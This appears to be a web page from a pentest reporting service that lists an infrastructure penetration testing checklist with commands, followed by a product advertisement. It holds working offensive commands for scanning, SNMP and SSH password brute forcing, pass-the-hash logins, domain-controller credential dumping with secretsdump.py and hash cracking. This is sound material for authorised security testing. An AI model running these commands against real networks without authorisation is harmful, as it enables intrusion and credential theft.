Vulnsy
Infrastructure27 items

Infrastructure Pentest Checklist

A comprehensive checklist for internal and external infrastructure penetration testing. Covers network enumeration, service exploitation, privilege escalation, and lateral movement techniques for enterprise environments.

NIST SP 800-115PTESOSSTMMCIS Controls
Progress: 0 of 27 items
0%
Commands
nmap -sS -sV -O -T4 -p- -oA tcp_full target.com
nmap -sU --top-ports 200 -T4 -oA udp_top target.com
rustscan -a target.com --ulimit 5000 -- -sV -sC
Commands
nmap -sV -sC -p <ports> target.com -oA services
Commands
dig AXFR @ns1.target.com target.com
dnsrecon -d target.com -t axfr
fierce --domain target.com
Commands
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 10.0.0.0/24
snmpwalk -v2c -c public 10.0.0.5
Commands
crackmapexec smb 10.0.0.0/24 --shares
smbclient -L //10.0.0.5 -N
showmount -e 10.0.0.5
Commands
nmap --script vuln -p- target.com
nuclei -u https://target.com -severity high,critical
Commands
nmap -p 445 --script smb-vuln-ms17-010 10.0.0.0/24
nmap -p 1433,3389,445 --script vuln 10.0.0.0/24
Evidence to capture

scanner output (Nessus/Nmap NSE) showing the CVE ID and affected host, plus a successful exploitation proof or vulnerability check confirmation.

Commands
hydra -L users.txt -P /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt ssh://10.0.0.5
crackmapexec smb 10.0.0.0/24 -u users.txt -p passwords.txt
Commands
testssl.sh https://target.com:443
sslyze --regular target.com
Commands
nmap -p 21,23,80,389,143,110 -sV 10.0.0.0/24
Evidence to capture

screenshot of an interactive shell or session on the compromised host with command output (e.g. `whoami`, `hostname`, `id`).

Commands
linpeas.sh
winpeas.exe
BloodHound.py
Evidence to capture

before/after `whoami` output demonstrating escalation from low-privilege user to root or SYSTEM, plus the technique used.

Commands
crackmapexec smb 10.0.0.0/24 -u Administrator -H <ntlm_hash>
evil-winrm -i 10.0.0.5 -u user -H <ntlm_hash>
Commands
secretsdump.py -just-dc DOMAIN/Administrator@10.0.0.5
hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
Commands
nmap -sS -Pn -p- --max-retries 1 <segmented_target>

Report Vulnerabilities Faster with Vulnsy

Stop rewriting the same findings. Use Vulnsy's reusable templates, collaborative workflows, and professional report generation to deliver pentest reports 10x faster.

Start Free Trial